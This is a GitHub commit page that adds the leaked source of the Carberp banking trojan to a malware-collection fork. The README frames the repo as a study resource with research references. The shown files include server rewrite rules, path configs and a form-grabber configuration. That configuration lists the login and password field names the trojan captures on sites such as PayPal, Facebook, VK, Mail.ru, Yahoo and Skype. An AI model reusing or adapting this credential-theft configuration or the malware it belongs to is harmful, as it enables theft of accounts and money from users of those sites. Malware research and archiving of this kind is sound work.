forked from RamadhanAmizudin/malware
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
10,467 changed files
with
2,686,806 additions
and
0 deletions.
The diff you're trying to view is too large. We only load the first 3000 changed files.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,39 @@ | ||
| Carberp 2013 Code Leak | ||
|
|
||
| The aim of this repo is to simplify access to those who want to study it, includes: | ||
|
|
||
| * Source code of the Carberp botnet leaked on some Russian underground forums, nothing has been touched (even though all the executables, builders and password protected files were deleted, contact me if you need them). | ||
| * Admin Panel | ||
| * [translations](http://malwageddon.blogspot.co.uk/2013/06/carberp-olympus-has-fallen.html) | ||
|
|
||
| ### References | ||
|
|
||
| - http://2011.zeronights.org/files/alexandermatrosoveugenerodionov-moderntechnologiesinmalwareprogramsdevelopingforrbssystems-111202040302-phpapp01.pdf | ||
| - http://go.eset.com/us/resources/white-papers/carberp.pdf | ||
| - http://go.eset.com/us/resources/white-papers/Hodprot-Report.pdf | ||
| - http://krebsonsecurity.com/2013/06/carberp-code-leak-stokes-copycat-fears/ | ||
| - http://malware.dontneedcoffee.com/2012/12/carberprenaissance.html | ||
| - http://malwareint.blogspot.co.uk/2011/02/inside-carberp-botnet.html | ||
| - http://pxnow.prevx.com/content/blog/carberp-a_modular_information_stealing_trojan.pdf | ||
| - https://blogs.technet.microsoft.com/mmpc/2013/11/20/carberp-based-trojan-attacking-sap/ | ||
| - https://securelist.com/blog/incidents/32036/carberp-its-not-over-yet-2/ | ||
| - https://securelist.com/blog/virus-watch/57658/carberp-in-the-mobile/ | ||
| - https://securityintelligence.com/carberp-source-code-sale-free-bootkit-included/ | ||
| - https://securityintelligence.com/carberp-steals-e-cash-vouchers-facebook-users/ | ||
| - https://web.archive.org/web/20111004014029/http://www.trusteer.com/sites/default/files/Carberp_Analysis.pdf | ||
| - https://web.archive.org/web/20120315132632/http://quequero.org/Carberp_Reverse_Engineering | ||
| - https://web.archive.org/web/20120503023819/http://www.malwareint.com/docs/inside-carberp-botnet-en.pdf | ||
| - https://www.fox-it.com/en/files/2014/12/Anunak_APT-against-financial-institutions2.pdf | ||
| - https://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Win32%2fCarberp | ||
| - http://www.infospyware.net/blog/carberp-silent-trojan-eventual-successor-to-zeus/ | ||
| - http://www.rsaconference.com/writable/presentations/file_upload/ht-t06-dissecting-banking-trojan-carberp_copy1.pdf | ||
| - http://www.welivesecurity.com/2011/11/21/evolution-of-win32carberp-going-deeper/ | ||
| - http://www.welivesecurity.com/2011/12/04/carberp-blackhole-growing-fraud-incidents/ | ||
| - http://www.welivesecurity.com/2012/02/22/rovnix-reloaded-new-step-of-evolution/ | ||
| - http://www.welivesecurity.com/2012/03/30/blackhole-cve-2012-0507-and-carberp/ | ||
| - http://www.welivesecurity.com/2012/05/24/carberp-gang-evolution-at-caro-2012/ | ||
| - http://www.welivesecurity.com/2012/06/05/smartcard-vulnerabilities-in-modern-banking-malware/ | ||
| - http://www.welivesecurity.com/2012/07/02/all-carberp-botnet-organizers-arrested/ | ||
| - http://www.welivesecurity.com/2013/03/25/carberp-the-never-ending-story/ | ||
| - http://www.welivesecurity.com/wp-content/media_files/Carberp-Evolution-and-BlackHole-public.pdf | ||
| - [Spam Nation book by Brian Krebs](https://www.amazon.co.uk/Spam-Nation-Organized-Cybercrime--Epidemic/dp/1492603236/) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,10 @@ | ||
| rewriteEngine on | ||
| rewriteBase / | ||
|
|
||
| RewriteRule ^(css|images|js)/(.*)$ templates/$1/$2 [QSA] | ||
| RewriteRule ^([a-zA-Z0-9_]+)\/([a-zA-Z0-9_]+)(-([0-9]+))?\.html(.*)?$ index.php?%{QUERY_STRING}&to=$1&go=$2&id=$4 [QSA] | ||
| RewriteRule ^([a-zA-Z0-9_]+)\/([a-zA-Z0-9_]+)(-([A-Za-z0-9-_]+))?\.html(.*)?$ index.php?%{QUERY_STRING}&to=$1&go=$2&str=$4 [QSA] | ||
| RewriteRule ^([a-zA-Z0-9_]+)(\/)?$ index.php?to=$1&go=index [QSA] | ||
|
|
||
| AddDefaultCharset utf-8 | ||
|
|
Large diffs are not rendered by default.
Oops, something went wrong.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,4 @@ | ||
| <Files "*.*"> | ||
| Order allow,deny | ||
| Deny from all | ||
| </Files> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1 @@ | ||
| {"script":"Z:\\home\\z9a.homeip.net\\www\\crons","site":"Z:\/home\/z9a.homeip.net\/www\/\/","logs":"Z:\/home\/z9a.homeip.net\/www\/logs\/\/"} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1 @@ | ||
| {"script":"Z:\\home\\z9a.homeip.net\\www\\crons","site":"Z:\/home\/z9a.homeip.net\/www\/\/","logs":"Z:\/home\/z9a.homeip.net\/www\/logs\/\/"} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1 @@ | ||
| {"script":"Z:\\home\\z9a.homeip.net\\www\\crons","site":"Z:\/home\/z9a.homeip.net\/www\/","logs":"Z:\/home\/z9a.homeip.net\/www\/logs\/","u":{"5":"Z:\/home\/z9a.homeip.net\/www\/logs\/unnecessary\/fgr\/","6":"Z:\/home\/z9a.homeip.net\/www\/logs\/unnecessary\/gra\/"},"s":{"5":"Z:\/home\/z9a.homeip.net\/www\/logs\/save_logs\/fgr\/","6":"Z:\/home\/z9a.homeip.net\/www\/logs\/save_logs\/gra\/"}} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1 @@ | ||
| {"mail.yandex.ru":{"id":"22","fields":{"name":{"1":"\u0415\u043c\u0430\u0438\u043b","2":"\u041f\u0430\u0440\u043e\u043b\u044c"},"grabber":{"1":"1","2":"2"},"formgrabber":{"1":"login","2":"passwd"}},"host":"mail.yandex.ru","save_log":"1"},"rambler.ru":{"id":"23","fields":{"name":{"1":"\u041b\u043e\u0433\u0438\u043d","2":"\u041f\u0430\u0440\u043e\u043b\u044c"},"grabber":{"1":"1","2":"2"},"formgrabber":{"1":"login,@,domain","2":"passw"}},"host":"rambler.ru","save_log":"0"},"odnoklassniki.ru":{"id":"24","fields":{"name":{"1":"\u041b\u043e\u0433\u0438\u043d","2":"\u041f\u0430\u0440\u043e\u043b\u044c"},"grabber":{"1":"1","2":"2"},"formgrabber":{"1":"st_email","2":"st_password"}},"host":"odnoklassniki.ru","save_log":"0"},"odnoklasniki.ru":{"id":"24","fields":{"name":{"1":"\u041b\u043e\u0433\u0438\u043d","2":"\u041f\u0430\u0440\u043e\u043b\u044c"},"grabber":{"1":"1","2":"2"},"formgrabber":{"1":"st_email","2":"st_password"}},"host":"odnoklasniki.ru","save_log":"0"},"odnoklassniki.ua":{"id":"24","fields":{"name":{"1":"\u041b\u043e\u0433\u0438\u043d","2":"\u041f\u0430\u0440\u043e\u043b\u044c"},"grabber":{"1":"1","2":"2"},"formgrabber":{"1":"st_email","2":"st_password"}},"host":"odnoklassniki.ua","save_log":"0"},"odnoklasniki.ua":{"id":"24","fields":{"name":{"1":"\u041b\u043e\u0433\u0438\u043d","2":"\u041f\u0430\u0440\u043e\u043b\u044c"},"grabber":{"1":"1","2":"2"},"formgrabber":{"1":"st_email","2":"st_password"}},"host":"odnoklasniki.ua","save_log":"0"},"vkontakte.ru":{"id":"25","fields":{"name":{"1":"\u041b\u043e\u0433\u0438\u043d","2":"\u041f\u0430\u0440\u043e\u043b\u044c"},"grabber":{"1":"1","2":"2"},"formgrabber":{"1":"email","2":"pass"}},"host":"vkontakte.ru","save_log":"0"},"vk.com":{"id":"25","fields":{"name":{"1":"\u041b\u043e\u0433\u0438\u043d","2":"\u041f\u0430\u0440\u043e\u043b\u044c"},"grabber":{"1":"1","2":"2"},"formgrabber":{"1":"email","2":"pass"}},"host":"vk.com","save_log":"0"},"facebook.com":{"id":"26","fields":{"name":{"1":"\u041b\u043e\u0433\u0438\u043d","2":"\u041f\u0430\u0440\u043e\u043b\u044c"},"grabber":{"1":"1","2":"2"},"formgrabber":{"1":"email","2":"pass"}},"host":"facebook.com","save_log":"0"},"yahoo.com":{"id":"27","fields":{"name":{"1":"\u0415\u043c\u0430\u0438\u043b","2":"\u041f\u0430\u0440\u043e\u043b\u044c"},"grabber":{"1":"1","2":"2"},"formgrabber":{"1":"login","2":"passwd"}},"host":"yahoo.com","save_log":"0"},"yahoo.comhttp":{"id":"27","fields":{"name":{"1":"\u0415\u043c\u0430\u0438\u043b","2":"\u041f\u0430\u0440\u043e\u043b\u044c"},"grabber":{"1":"1","2":"2"},"formgrabber":{"1":"login","2":"passwd"}},"host":"yahoo.comhttp","save_log":"0"},"mail.ru":{"id":"28","fields":{"name":{"1":"\u041b\u043e\u0433\u0438\u043d","2":"\u041f\u0430\u0440\u043e\u043b\u044c"},"grabber":{"1":"1","2":"2"},"formgrabber":{"1":"Login,@,Domain","2":"Password"}},"host":"mail.ru","save_log":"1"},"auth.mail.ru":{"id":"28","fields":{"name":{"1":"\u041b\u043e\u0433\u0438\u043d","2":"\u041f\u0430\u0440\u043e\u043b\u044c"},"grabber":{"1":"1","2":"2"},"formgrabber":{"1":"Login,@,Domain","2":"Password"}},"host":"auth.mail.ru","save_log":"1"},"rutracker.org":{"id":"29","fields":{"name":{"1":"\u041b\u043e\u0433\u0438\u043d","2":"\u041f\u0430\u0440\u043e\u043b\u044c"},"grabber":{"1":"1","2":"2"},"formgrabber":{"1":"","2":""}},"host":"rutracker.org","save_log":"0"},"torrents.ru":{"id":"29","fields":{"name":{"1":"\u041b\u043e\u0433\u0438\u043d","2":"\u041f\u0430\u0440\u043e\u043b\u044c"},"grabber":{"1":"1","2":"2"},"formgrabber":{"1":"","2":""}},"host":"torrents.ru","save_log":"0"},"rapidshare.com":{"id":"30","fields":{"name":{"1":"\u041b\u043e\u0433\u0438\u043d","2":"\u041f\u0430\u0440\u043e\u043b\u044c"},"grabber":{"1":"1","2":"2"},"formgrabber":{"1":"","2":""}},"host":"rapidshare.com","save_log":"0"},"myspace.com":{"id":"31","fields":{"name":{"1":"\u0415\u043c\u0430\u0438\u043b","2":"\u041f\u0430\u0440\u043e\u043b\u044c"},"grabber":{"1":"1","2":"2"},"formgrabber":{"1":"ctl00$ctl00$cpMain$cpMain$LoginBox$Email_Textbox","2":"ctl00$ctl00$cpMain$cpMain$LoginBox$Password_Textbox"}},"host":"myspace.com","save_log":"0"},"powertracker.org":{"id":"32","fields":{"name":{"1":"\u041b\u043e\u0433\u0438\u043d","2":"\u041f\u0430\u0440\u043e\u043b\u044c"},"grabber":{"1":"1","2":"2"},"formgrabber":{"1":"","2":""}},"host":"powertracker.org","save_log":"0"},"tfile.ru":{"id":"33","fields":{"name":{"1":"\u041b\u043e\u0433\u0438\u043d","2":"\u041f\u0430\u0440\u043e\u043b\u044c"},"grabber":{"1":"1","2":"2"},"formgrabber":{"1":"","2":""}},"host":"tfile.ru","save_log":"0"},"connect.ua":{"id":"34","fields":{"name":{"1":"\u041b\u043e\u0433\u0438\u043d","2":"\u041f\u0430\u0440\u043e\u043b\u044c"},"grabber":{"1":"1","2":"2"},"formgrabber":{"1":"","2":""}},"host":"connect.ua","save_log":"0"},"fotostrana.ru":{"id":"35","fields":{"name":{"1":"\u041b\u043e\u0433\u0438\u043d","2":"\u041f\u0430\u0440\u043e\u043b\u044c"},"grabber":{"1":"1","2":"2"},"formgrabber":{"1":"","2":""}},"host":"fotostrana.ru","save_log":"0"},"paypal.com":{"id":"36","fields":{"name":{"1":"\u0415\u043c\u0430\u0438\u043b","2":"\u041f\u0430\u0440\u043e\u043b\u044c"},"grabber":{"1":"1","2":"2"},"formgrabber":{"1":"login_email","2":"login_password"}},"host":"paypal.com","save_log":"0"},"moneybookers.com":{"id":"37","fields":{"name":{"1":"\u041b\u043e\u0433\u0438\u043d","2":"\u041f\u0430\u0440\u043e\u043b\u044c"},"grabber":{"1":"1","2":"2"},"formgrabber":{"1":"txtEmail","2":"txtPassword"}},"host":"moneybookers.com","save_log":"0"},"imoney.ua":{"id":"38","fields":{"name":{"1":"\u041b\u043e\u0433\u0438\u043d","2":"\u041f\u0430\u0440\u043e\u043b\u044c"},"grabber":{"1":"1","2":"2"},"formgrabber":{"1":"","2":""}},"host":"imoney.ua","save_log":"0"},"epassporte.com":{"id":"39","fields":{"name":{"1":"\u041b\u043e\u0433\u0438\u043d","2":"\u041f\u0430\u0440\u043e\u043b\u044c"},"grabber":{"1":"1","2":"2"},"formgrabber":{"1":"","2":""}},"host":"epassporte.com","save_log":"0"},"alertpay.com":{"id":"40","fields":{"name":{"1":"\u041b\u043e\u0433\u0438\u043d","2":"\u041f\u0430\u0440\u043e\u043b\u044c"},"grabber":{"1":"1","2":"2"},"formgrabber":{"1":"","2":""}},"host":"alertpay.com","save_log":"0"},"ukr.net":{"id":"41","fields":{"name":{"1":"\u041b\u043e\u0433\u0438\u043d","2":"\u041f\u0430\u0440\u043e\u043b\u044c"},"grabber":{"1":"1","2":"2"},"formgrabber":{"1":"","2":""}},"host":"ukr.net","save_log":"0"},"novafilm.tv":{"id":"42","fields":{"name":{"1":"\u041b\u043e\u0433\u0438\u043d","2":"\u041f\u0430\u0440\u043e\u043b\u044c"},"grabber":{"1":"1","2":"2"},"formgrabber":{"1":"","2":""}},"host":"novafilm.tv","save_log":"0"},"lostfilm.tv":{"id":"43","fields":{"name":{"1":"\u041b\u043e\u0433\u0438\u043d","2":"\u041f\u0430\u0440\u043e\u043b\u044c"},"grabber":{"1":"1","2":"2"},"formgrabber":{"1":"","2":""}},"host":"lostfilm.tv","save_log":"0"},"kvadratmalevicha.ru":{"id":"44","fields":{"name":{"1":"\u041b\u043e\u0433\u0438\u043d","2":"\u041f\u0430\u0440\u043e\u043b\u044c"},"grabber":{"1":"1","2":"2"},"formgrabber":{"1":"","2":""}},"host":"kvadratmalevicha.ru","save_log":"0"},"1001cinema.ru":{"id":"45","fields":{"name":{"1":"\u041b\u043e\u0433\u0438\u043d","2":"\u041f\u0430\u0440\u043e\u043b\u044c"},"grabber":{"1":"1","2":"2"},"formgrabber":{"1":"","2":""}},"host":"1001cinema.ru","save_log":"0"},"depositfiles.com":{"id":"46","fields":{"name":{"1":"\u041b\u043e\u0433\u0438\u043d","2":"\u041f\u0430\u0440\u043e\u043b\u044c"},"grabber":{"1":"1","2":"2"},"formgrabber":{"1":"","2":""}},"host":"depositfiles.com","save_log":"0"},"blogger.com":{"id":"47","fields":{"name":{"1":"\u041b\u043e\u0433\u0438\u043d","2":"\u041f\u0430\u0440\u043e\u043b\u044c"},"grabber":{"1":"1","2":"2"},"formgrabber":{"1":"Email","2":"Passwd"}},"host":"blogger.com","save_log":"0"},"skype.com":{"id":"48","fields":{"name":{"1":"\u041b\u043e\u0433\u0438\u043d","2":"\u041f\u0430\u0440\u043e\u043b\u044c"},"grabber":{"1":"1","2":"2"},"formgrabber":{"1":"username","2":"password"}},"host":"skype.com","save_log":"0"},"aruba.it":{"id":"49","fields":{"name":{"1":"\u041b\u043e\u0433\u0438\u043d","2":"\u041f\u0430\u0441\u0441"},"grabber":{"1":"1","2":"2"},"formgrabber":{"1":"LOGIN","2":"PASSWD"}},"host":"aruba.it","save_log":"0"},"telemoney.ru":{"id":"50","fields":{"name":{"1":"\u0415\u043c\u0430\u0438\u043b","2":"\u041f\u0430\u0440\u043e\u043b\u044c"},"grabber":{"1":"1","2":"2"},"formgrabber":{"1":"email","2":"^pw"}},"host":"telemoney.ru","save_log":"0"},"zjadina.ru":{"id":"52","fields":{"name":{"1":"login","2":"pass"},"grabber":{"1":"1","2":"2"},"formgrabber":{"1":"USER_LOGIN","2":"USER_PASSWORD"}},"host":"zjadina.ru","save_log":"0"}} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,4 @@ | ||
| <Files "*.*"> | ||
| Order allow,deny | ||
| Allow from all | ||
| </Files> |
Binary file not shown.
Oops, something went wrong.